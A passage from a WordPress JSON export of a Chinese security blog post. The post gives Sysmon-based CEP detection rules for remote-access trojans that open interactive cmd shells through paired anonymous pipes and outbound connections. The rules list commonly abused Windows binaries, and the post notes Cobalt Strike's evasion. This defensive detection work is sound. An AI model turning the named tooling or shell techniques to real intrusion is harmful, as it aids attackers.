StringUtils.wildcard_match(event_data_image, \"*\\\\msiexec.exe\")\r\n        or StringUtils.wildcard_match(event_data_image, \"*\\\\sctasks.exe\")\r\n        or StringUtils.wildcard_match(event_data_image, \"*\\\\wscript.exe\")\r\n        or StringUtils.wildcard_match(event_data_image, \"*\\\\tasklist.exe\")\r\n        or StringUtils.wildcard_match(event_data_image, \"*\\\\taskkill.exe\")\r\n        or StringUtils.wildcard_match(event_data_image, \"*\\\\ping.exe\")\r\n        or StringUtils.wildcard_match(event_data_image, \"*\\\\nslookup.exe\")\r\n        or StringUtils.wildcard_match(event_data_image, \"*\\\\tracert.exe\")\r\n        or StringUtils.wildcard_match(event_data_image, \"*\\\\xcopy.exe\")\r\n        or StringUtils.wildcard_match(event_data_image, \"*\\\\quser.exe\")\r\n        or StringUtils.wildcard_match(event_data_image, \"*\\\\netstat.exe\")\r\n        or StringUtils.wildcard_match(event_data_image, \"*\\\\qprocess.exe\")\r\n        or StringUtils.wildcard_match(event_data_image, \"*\\\\nltest.exe\")\r\n    )\r\n)\r\nor\r\n(\r\n    event_id = \"10\"\r\n    and (\r\n        StringUtils.wildcard_match(event_data_targetimage, \"*\\\\cmd.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\powershell.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\whoami.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\hostname.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\net.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\net1.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\systeminfo.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\wmic.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\regsvr32.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\bitsadmin.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\cmstp.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\mshta.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\certutil.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\rundll32.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\cscript.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\msiexec.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\sctasks.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\wscript.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\tasklist.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\taskkill.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\ping.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\nslookup.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\tracert.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\xcopy.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\quser.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\netstat.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\qprocess.exe\")\r\n        or StringUtils.wildcard_match(event_data_targetimage, \"*\\\\nltest.exe\")\r\n    )\r\n);\r\n'<\/pre>\n<h3><span class=\"ez-toc-section\" id=\"2%E3%80%81%E6%A3%80%E6%B5%8B%E9%80%9A%E8%BF%87%E7%BB%91%E5%AE%9A2%E4%B8%AA%E5%8C%BF%E5%90%8D%E7%AE%A1%E9%81%93%E6%89%A7%E8%A1%8C%E4%BA%A4%E4%BA%92%E5%BC%8F%E5%91%BD%E4%BB%A4\"><\/span>2\u3001\u68c0\u6d4b\u901a\u8fc7\u7ed1\u5b9a2\u4e2a\u533f\u540d\u7ba1\u9053\u6267\u884c\u4ea4\u4e92\u5f0f\u547d\u4ee4<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># \u901a\u8fc7\u7ed1\u5b9a2\u4e2a\u5355\u5411\u533f\u540d\u7ba1\u9053\u6267\u884c\u4ea4\u4e92\u5f0fCMD\u547d\u4ee4_Sysmon\r\nepl: '\r\n@name(\"\u901a\u8fc7\u7ed1\u5b9a2\u4e2a\u5355\u5411\u533f\u540d\u7ba1\u9053\u6267\u884c\u4ea4\u4e92\u5f0fCMD\u547d\u4ee4_Sysmon_\u5185\u8054\u67e5\u8be2\")\r\nselect * from\r\ndc9ska0wsa_win as a1,\r\ndc9ska0wsa_win as b1,\r\ndc9ska0wsa_win as a2,\r\ndc9ska0wsa_win as b2,\r\ndc9ska0wsa_win as c1,\r\ndc9ska0wsa_win as d\r\n\r\nwhere\r\na1.event_id = \"17\"\r\nand a2.event_id = \"17\"\r\nand b1.event_id = \"18\"\r\nand b2.event_id = \"18\"\r\nand c1.event_id = \"10\"\r\nand d.event_id = \"1\"\r\n\r\nand a1.log_id != a2.log_id\r\nand b1.log_id != b2.log_id\r\n\r\nand a1.event_data_eventtype = \"createpipe\"\r\nand a1.event_data_pipename = \"&lt;anonymous pipe&gt;\"\r\nand a2.event_data_eventtype = \"createpipe\"\r\nand a2.event_data_pipename = \"&lt;anonymous pipe&gt;\"\r\nand b1.event_data_eventtype = \"connectpipe\"\r\nand b1.event_data_pipename = \"&lt;anonymous pipe&gt;\"\r\nand b2.event_data_eventtype = \"connectpipe\"\r\nand b2.event_data_pipename = \"&lt;anonymous pipe&gt;\"\r\n\r\nand a1.computer_name = b1.computer_name\r\nand a1.event_data_image = b1.event_data_image\r\nand a1.event_data_processguid = b1.event_data_processguid\r\nand a1.event_data_processid = b1.event_data_processid\r\n\r\nand b1.computer_name = a2.computer_name\r\nand b1.event_data_image = a2.event_data_image\r\nand b1.event_data_processguid = a2.event_data_processguid\r\nand b1.event_data_processid = a2.event_data_processid\r\n\r\nand a2.computer_name = b2.computer_name\r\nand a2.event_data_image = b2.event_data_image\r\nand a2.event_data_processguid = b2.event_data_processguid\r\nand a2.event_data_processid = b2.event_data_processid\r\n\r\nand b2.computer_name = c1.computer_name\r\nand b2.event_data_image = c1.event_data_sourceimage\r\nand b2.event_data_processguid = c1.event_data_sourceprocessguid\r\nand b2.event_data_processid = c1.event_data_sourceprocessid\r\n\r\nand c1.computer_name = d.computer_name\r\nand c1.event_data_sourceimage = d.event_data_parentimage\r\nand c1.event_data_sourceprocessguid = d.event_data_parentprocessguid\r\nand c1.event_data_sourceprocessid = d.event_data_parentprocessid\r\n\r\nand c1.event_data_targetimage = d.event_data_image\r\nand c1.event_data_targetprocessguid = d.event_data_processguid\r\nand c1.event_data_targetprocessid = d.event_data_processid\r\n\r\nand a1.unix_timestamp &lt;= b1.unix_timestamp\r\nand a2.unix_timestamp &lt;= b2.unix_timestamp\r\n\r\nand b1.unix_timestamp &lt;= c1.unix_timestamp\r\nand a1.unix_timestamp &lt;= d.unix_timestamp\r\n\r\nand Math.abs(d.unix_timestamp - a1.unix_timestamp) &lt; 3000\r\nand Math.abs(a1.unix_timestamp - b1.unix_timestamp) &lt; 1500\r\nand Math.abs(a2.unix_timestamp - b2.unix_timestamp) &lt; 1500\r\nand Math.abs(c1.unix_timestamp - d.unix_timestamp) &lt; 1500\r\n;\r\n\r\n'<\/pre>\n<h3><span class=\"ez-toc-section\" id=\"3%E3%80%81%E5%85%B3%E8%81%94%E7%BD%91%E7%BB%9C%E4%BA%8B%E4%BB%B6%E7%A1%AE%E5%AE%9A%E8%BF%9C%E6%8E%A7%E8%BF%9B%E7%A8%8B\"><\/span>3\u3001\u5173\u8054\u7f51\u7edc\u4e8b\u4ef6\u786e\u5b9a\u8fdc\u63a7\u8fdb\u7a0b<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u5982\u679c\u4ec5\u4ec5\u5355\u4e00\u68c0\u6d4b\u7236\u8fdb\u7a0b\u901a\u8fc7\u7ed1\u5b9a\u533f\u540d\u7ba1\u9053\u4e0e\u5b50\u8fdb\u7a0b\u521b\u5efa\u4ea4\u4e92\u5f0fshell\uff0c\u53ef\u80fd\u5b58\u5728\u5927\u91cf\u8bef\u62a5\uff0c\u4f8b\u5982\u67d0\u4e9bIDE\u7684\u4eff\u771f\u63a7\u5236\u53f0\uff0c\u4e5f\u4f1a\u4f7f\u7528\u8fd9\u79cd\u5f62\u5f0f\uff0c\u56e0\u6b64\u9700\u8981\u7ed3\u5408\u7f51\u7edc\u8fde\u63a5\u4fe1\u606f\u7efc\u5408\u5224\u65ad\uff0c\u4f8b\u5982\u4e3b\u52a8\u53d1\u8d77\u8fc7\u5bf9\u516c\u7f51\u7684TCP\u8fde\u63a5\uff0c\u90a3\u4e48\u884c\u4e3a\u5c31\u5f88\u53ef\u7591\uff1a<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># \u53ef\u7591\u8fdb\u7a0b\u901a\u8fc72\u4e2a\u5355\u5411\u533f\u540d\u7ba1\u9053\u6267\u884c\u4ea4\u4e92\u5f0fCMD\u547d\u4ee4\r\nepl: '\r\n@name(\"\u53ef\u7591\u8fdb\u7a0b\u901a\u8fc72\u4e2a\u5355\u5411\u533f\u540d\u7ba1\u9053\u6267\u884c\u4ea4\u4e92\u5f0fCMD\u547d\u4ee4_Sysmon_DC_\u67e5\u8be2\u540c\u65f6\u6709\u4e24\u4e2a\u884c\u4e3a\u7684\u8fdb\u7a0b_1\")\r\nselect * from pattern [\r\n    every-distinct(\r\n        a.computer_name, a.event_data_sourceip, a.event_data_destinationip,\r\n        a.event_data_destinationport, a.event_data_image, 3 hour\r\n    )\r\n    a=SysmonRawLogs(\r\n        event_id = \"3\"\r\n        and event_data_initiated = \"true\"\r\n\r\n        and IPAddress4Utils.is_valid_ipv4(event_data_sourceip)\r\n        and IPAddress4Utils.is_valid_ipv4(event_data_destinationip)\r\n\r\n        and event_data_sourceip != \"127.0.0.1\"\r\n        and event_data_destinationip != \"127.0.0.1\"\r\n\r\n        and not StringUtils.wildcard_match(event_data_image, \"*\\\\google\\\\*\")\r\n        and not StringUtils.wildcard_match(event_data_image, \"*\\\\inetsrv\\\\w3wp.exe\")\r\n        and not StringUtils.wildcard_match(event_data_image, \"*\\\\system32\\\\dns.exe\")\r\n        and not StringUtils.wildcard_match(event_data_image, \"*\\\\system32\\\\svchost.exe\")\r\n    ) -&gt;\r\n\r\n    b=ComplexAttackAlerts(\r\n        rule_name = \"\u901a\u8fc7\u7ed1\u5b9a2\u4e2a\u5355\u5411\u533f\u540d\u7ba1\u9053\u6267\u884c\u4ea4\u4e92\u5f0fCMD\u547d\u4ee4_Sysmon\"\r\n        and a.computer_name = host_computer_name\r\n        and a.event_data_image = host_parent_images\r\n        and a.event_data_processguid = host_parent_guid\r\n        and a.event_data_processid = host_parent_pid\r\n    ) where timer:within(6 hour)\r\n];\r\n\r\n'<\/pre>\n<h3><span class=\"ez-toc-section\" id=\"4%E3%80%81%E8%AF%AF%E6%8A%A5%E6%83%85%E5%86%B5\"><\/span>4\u3001\u8bef\u62a5\u60c5\u51b5<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u65b0\u89c4\u5219\u4e0a\u7ebf\u53ef\u80fd\u5b58\u5728\u90e8\u5206\u8bef\u62a5\uff0c\u67d0\u4e9b\u6b63\u5e38\u8f6f\u4ef6\u4e5f\u5b58\u5728\u7c7b\u4f3c\u7684\u884c\u4e3a\uff0c\u4f46\u8bef\u62a5\u91cf\u4e5f\u5f88\u5c11\uff0c\u6dfb\u52a0\u5c11\u91cf\u767d\u540d\u5355\u5373\u53ef\u6536\u655b\u6389\uff0c\u6700\u540e\u544a\u8b66\u4ea7\u751f\u7684\u6548\u679c\uff1a<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-839\" title=\"78178be7f0f786af220757c65b1525f5\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/78178be7f0f786af220757c65b1525f5.png\" alt=\"78178be7f0f786af220757c65b1525f5\" width=\"746\" height=\"437\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/78178be7f0f786af220757c65b1525f5.png 2108w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/78178be7f0f786af220757c65b1525f5-768x450.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/78178be7f0f786af220757c65b1525f5-1536x899.png 1536w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/78178be7f0f786af220757c65b1525f5-2048x1199.png 2048w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/78178be7f0f786af220757c65b1525f5-1920x1124.png 1920w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/78178be7f0f786af220757c65b1525f5-1170x685.png 1170w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/78178be7f0f786af220757c65b1525f5-585x342.png 585w\" sizes=\"auto, (max-width: 746px) 100vw, 746px\" \/><\/p>\n<p>&nbsp;<\/p>\n<h1><span class=\"ez-toc-section\" id=\"%E5%9B%9B%E3%80%81%E5%90%8E%E8%AF%9D\"><\/span>\u56db\u3001\u540e\u8bdd<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>\u8fd9\u4e2a\u6a21\u578b\u4ec5\u4ec5\u9002\u7528\u4e8e\u56de\u8fde\u578b\u8fdc\u63a7\u7684\u4ea4\u4e92\u5f0fshell\u529f\u80fd\uff0c\u5982\u679c\u653b\u51fb\u8005\u4e0d\u4f7f\u7528\u8fd9\u4e2a\u529f\u80fd\uff0c\u662f\u65e0\u6cd5\u89e6\u53d1\u544a\u8b66\uff0c\u76ee\u524d\u6d4b\u8bd5\u53ef\u76d1\u63a7\u5e02\u9762\u4e0a\u5e38\u89c1\u7684\u8fdc\u63a7\uff0c\u5305\u62ec\u5546\u4e1a\u548c\u81ea\u7814\u7684\u8fdc\u63a7\uff0c\u770b\u6765\u5404\u5bb6\u7684\u5b9e\u73b0\u65b9\u5f0f\u57fa\u672c\u90fd\u662f\u901a\u8fc7\u7ed1\u5b9a2\u4e2a\u5355\u5411\u533f\u540d\u7ba1\u9053\u3002<\/p>\n<p>\u4f46\u4e5f\u6709\u7684\u4e0d\u80fd\u88ab\u76d1\u63a7\uff0c\u4f8b\u5982CobaltStrike\uff0c\u539f\u56e0\u662fCobaltStrike\u7684shell\u4e0d\u662f\u4ea4\u4e92\u5f0f\u7684\uff0c\u800c\u662f\u4f7f\u7528\u7c7b\u4f3c\u4e8epopen()\u7684\u51fd\u6570\uff0c\u4ec5\u4ec5\u901a\u8fc71\u4e2a\u5355\u5411\u533f\u540d\u7ba1\u9053\uff0c\u5c06\u6267\u884c\u7684\u547d\u4ee4\u7ed3\u679c\u8bfb\u53d6\u51fa\u540e\u8fd4\u56de\u7ed9C2\uff0c\u4f46\u5bf9\u4e8epopen()\u8fd9\u79cd\u6267\u884c\u547d\u4ee4\u65b9\u5f0f\u7684\u76d1\u63a7\uff0c\u53ea\u9700\u5c06\u8fd9\u4e2a\u6a21\u578b\u6539\u4e3a\u300e\u53ef\u7591\u8fdb\u7a0b\u901a\u8fc71\u4e2a\u5355\u5411\u533f\u540d\u7ba1\u9053\u6267\u884c\u975e\u4ea4\u4e92\u5f0fCMD\u547d\u4ee4\u300f\u5373\u53ef\uff0c\u7ec6\u8282\u672c\u6587\u4e0d\u518d\u8d58\u8ff0\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u5bf9\u4e8e\u5927\u90e8\u5206\u8fdc\u63a7\uff0c\u5305\u62ec\u5546\u4e1a\/\u5f00\u6e90\/\u81ea\u7814\uff0c\u90fd\u63d0\u4f9b\u4ea4\u4e92\u5f0fcmdshell\u547d\u4ee4\u6267\u884c\u529f\u80fd\uff0c\u5e76\u4e14\u7ea2\u961f\u5728\u5185\u7f51\u62ff\u5230\u9a7b\u70b9\u7684\u540e\u6e17\u900f\u8fc7\u7a0b\u4e2d\uff0c\u4e5f\u6bd4\u8f83\u70ed\u8877\u4e8e\u4f7f\u7528\u8fd9\u4e2a\u529f\u80fd\uff0c\u5982\u679c\u76d1\u63a7\u8fd9\u7c7b\u573a\u666f\uff0c\u5c06\u6781\u5927\u63d0\u5347\u5165\u4fb5\u68c0\u51fa\u7387\u3002<\/p>\n","protected":false},"author":1,"featured_media":827,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[321],"tags":[353,350,354],"class_list":["post-825","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","tag-cep","tag-350","tag-354"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v16.9 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>\u901a\u7528\u6a21\u578b\u68c0\u6d4b\u8fdc\u63a7\u6728\u9a6c\u6267\u884c\u4ea4\u4e92\u5f0fcmdshell - Wayne&#039;s Blog<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/weizn.net\/?p=825\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u901a\u7528\u6a21\u578b\u68c0\u6d4b\u8fdc\u63a7\u6728\u9a6c\u6267\u884c\u4ea4\u4e92\u5f0fcmdshell - Wayne&#039;s Blog\" \/>\n<meta property=\"og:description\" content=\"\u5bf9\u4e8e\u5927\u90e8\u5206\u8fdc\u63a7\uff0c\u5305\u62ec\u5546\u4e1a\/\u5f00\u6e90\/\u81ea\u7814\uff0c\u90fd\u63d0\u4f9b\u4ea4\u4e92\u5f0fcmdshell\u547d\u4ee4\u6267\u884c\u529f\u80fd\uff0c\u5e76\u4e14\u7ea2\u961f\u5728\u5185\u7f51\u62ff\u5230\u9a7b\u70b9\u7684\u540e\u6e17\u900f\u8fc7\u7a0b\u4e2d\uff0c\u4e5f\u6bd4\u8f83\u70ed\u8877\u4e8e\u4f7f\u7528\u8fd9\u4e2a\u529f\u80fd\uff0c\u5982\u679c\u76d1\u63a7\u8fd9\u7c7b\u573a\u666f\uff0c\u5c06\u6781\u5927\u63d0\u5347\u5165\u4fb5\u68c0\u51fa\u7387\u3002\" \/>\n<meta property=\"og:url\" content=\"http:\/\/weizn.net\/?p=825\" \/>\n<meta property=\"og:site_name\" content=\"Wayne&#039;s Blog\" \/>\n<meta property=\"article:published_time\" content=\"2021-07-23T07:35:31+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-08-24T05:59:59+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/cmd-commands-t.jpeg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"630\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"zinan\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 \u5206\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"http:\/\/weizn.net\/#website\",\"url\":\"http:\/\/weizn.net\/\",\"name\":\"Wayne&#039;s Blog\",\"description\":\"\",\"publisher\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\/\/weizn.net\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"zh-Hans\"},{\"@type\":\"ImageObject\",\"@id\":\"http:\/\/weizn.net\/?p=825#primaryimage\",\"inLanguage\":\"zh-Hans\",\"url\":\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/cmd-commands-t.jpeg\",\"contentUrl\":\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/cmd-commands-t.jpeg\",\"width\":1200,\"height\":630},{\"@type\":\"WebPage\",\"@id\":\"http:\/\/weizn.net\/?p=825#webpage\",\"url\":\"http:\/\/weizn.net\/?p=825\",\"name\":\"\\u901a\\u7528\\u6a21\\u578b\\u68c0\\u6d4b\\u8fdc\\u63a7\\u6728\\u9a6c\\u6267\\u884c\\u4ea4\\u4e92\\u5f0fcmdshell - Wayne&#039;s Blog\",\"isPartOf\":{\"@id\":\"http:\/\/weizn.net\/#website\"},\"primaryImageOfPage\":{\"@id\":\"http:\/\/weizn.net\/?p=825#primaryimage\"},\"datePublished\":\"2021-07-23T07:35:31+00:00\",\"dateModified\":\"2021-08-24T05:59:59+00:00\",\"breadcrumb\":{\"@id\":\"http:\/\/weizn.net\/?p=825#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\/\/weizn.net\/?p=825\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\/\/weizn.net\/?p=825#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\\u9996\\u9875\",\"item\":\"http:\/\/weizn.net\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\\u901a\\u7528\\u6a21\\u578b\\u68c0\\u6d4b\\u8fdc\\u63a7\\u6728\\u9a6c\\u6267\\u884c\\u4ea4\\u4e92\\u5f0fcmdshell\"}]},{\"@type\":\"Article\",\"@id\":\"http:\/\/weizn.net\/?p=825#article\",\"isPartOf\":{\"@id\":\"http:\/\/weizn.net\/?p=825#webpage\"},\"author\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"headline\":\"\\u901a\\u7528\\u6a21\\u578b\\u68c0\\u6d4b\\u8fdc\\u63a7\\u6728\\u9a6c\\u6267\\u884c\\u4ea4\\u4e92\\u5f0fcmdshell\",\"datePublished\":\"2021-07-23T07:35:31+00:00\",\"dateModified\":\"2021-08-24T05:59:59+00:00\",\"mainEntityOfPage\":{\"@id\":\"http:\/\/weizn.net\/?p=825#webpage\"},\"wordCount\":72,\"commentCount\":0,\"publisher\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"image\":{\"@id\":\"http:\/\/weizn.net\/?p=825#primaryimage\"},\"thumbnailUrl\":\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/cmd-commands-t.jpeg\",\"keywords\":[\"CEP\",\"\\u5a01\\u80c1\\u68c0\\u6d4b\",\"\\u65e5\\u5fd7\\u5206\\u6790\"],\"articleSection\":[\"\\u5e94\\u7528\\u5b89\\u5168\"],\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"http:\/\/weizn.net\/?p=825#respond\"]}]},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\",\"name\":\"zinan\",\"logo\":{\"@id\":\"http:\/\/weizn.net\/#personlogo\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\u901a\u7528\u6a21\u578b\u68c0\u6d4b\u8fdc\u63a7\u6728\u9a6c\u6267\u884c\u4ea4\u4e92\u5f0fcmdshell - Wayne&#039;s Blog","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/weizn.net\/?p=825","og_locale":"zh_CN","og_type":"article","og_title":"\u901a\u7528\u6a21\u578b\u68c0\u6d4b\u8fdc\u63a7\u6728\u9a6c\u6267\u884c\u4ea4\u4e92\u5f0fcmdshell - Wayne&#039;s Blog","og_description":"\u5bf9\u4e8e\u5927\u90e8\u5206\u8fdc\u63a7\uff0c\u5305\u62ec\u5546\u4e1a\/\u5f00\u6e90\/\u81ea\u7814\uff0c\u90fd\u63d0\u4f9b\u4ea4\u4e92\u5f0fcmdshell\u547d\u4ee4\u6267\u884c\u529f\u80fd\uff0c\u5e76\u4e14\u7ea2\u961f\u5728\u5185\u7f51\u62ff\u5230\u9a7b\u70b9\u7684\u540e\u6e17\u900f\u8fc7\u7a0b\u4e2d\uff0c\u4e5f\u6bd4\u8f83\u70ed\u8877\u4e8e\u4f7f\u7528\u8fd9\u4e2a\u529f\u80fd\uff0c\u5982\u679c\u76d1\u63a7\u8fd9\u7c7b\u573a\u666f\uff0c\u5c06\u6781\u5927\u63d0\u5347\u5165\u4fb5\u68c0\u51fa\u7387\u3002","og_url":"http:\/\/weizn.net\/?p=825","og_site_name":"Wayne&#039;s Blog","article_published_time":"2021-07-23T07:35:31+00:00","article_modified_time":"2021-08-24T05:59:59+00:00","og_image":[{"width":1200,"height":630,"url":"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/cmd-commands-t.jpeg","path":"\/app\/wp-content\/uploads\/2021\/08\/cmd-commands-t.jpeg","size":"full","id":827,"alt":"","pixels":756000,"type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"zinan","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"6 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"http:\/\/weizn.net\/#website","url":"http:\/\/weizn.net\/","name":"Wayne&#039;s Blog","description":"","publisher":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/weizn.net\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"zh-Hans"},{"@type":"ImageObject","@id":"http:\/\/weizn.net\/?p=825#primaryimage","inLanguage":"zh-Hans","url":"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/cmd-commands-t.jpeg","contentUrl":"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/cmd-commands-t.jpeg","width":1200,"height":630},{"@type":"WebPage","@id":"http:\/\/weizn.net\/?p=825#webpage","url":"http:\/\/weizn.net\/?p=825","name":"\u901a\u7528\u6a21\u578b\u68c0\u6d4b\u8fdc\u63a7\u6728\u9a6c\u6267\u884c\u4ea4\u4e92\u5f0fcmdshell - Wayne&#039;s Blog","isPartOf":{"@id":"http:\/\/weizn.net\/#website"},"primaryImageOfPage":{"@id":"http:\/\/weizn.net\/?p=825#primaryimage"},"datePublished":"2021-07-23T07:35:31+00:00","dateModified":"2021-08-24T05:59:59+00:00","breadcrumb":{"@id":"http:\/\/weizn.net\/?p=825#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["http:\/\/weizn.net\/?p=825"]}]},{"@type":"BreadcrumbList","@id":"http:\/\/weizn.net\/?p=825#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9875","item":"http:\/\/weizn.net\/"},{"@type":"ListItem","position":2,"name":"\u901a\u7528\u6a21\u578b\u68c0\u6d4b\u8fdc\u63a7\u6728\u9a6c\u6267\u884c\u4ea4\u4e92\u5f0fcmdshell"}]},{"@type":"Article","@id":"http:\/\/weizn.net\/?p=825#article","isPartOf":{"@id":"http:\/\/weizn.net\/?p=825#webpage"},"author":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"headline":"\u901a\u7528\u6a21\u578b\u68c0\u6d4b\u8fdc\u63a7\u6728\u9a6c\u6267\u884c\u4ea4\u4e92\u5f0fcmdshell","datePublished":"2021-07-23T07:35:31+00:00","dateModified":"2021-08-24T05:59:59+00:00","mainEntityOfPage":{"@id":"http:\/\/weizn.net\/?p=825#webpage"},"wordCount":72,"commentCount":0,"publisher":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"image":{"@id":"http:\/\/weizn.net\/?p=825#primaryimage"},"thumbnailUrl":"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/cmd-commands-t.jpeg","keywords":["CEP","\u5a01\u80c1\u68c0\u6d4b","\u65e5\u5fd7\u5206\u6790"],"articleSection":["\u5e94\u7528\u5b89\u5168"],"inLanguage":"zh-Hans","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["http:\/\/weizn.net\/?p=825#respond"]}]},{"@type":["Person","Organization"],"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264","name":"zinan","logo":{"@id":"http:\/\/weizn.net\/#personlogo"}}]}},"_links":{"self":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts\/825","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=825"}],"version-history":[{"count":20,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/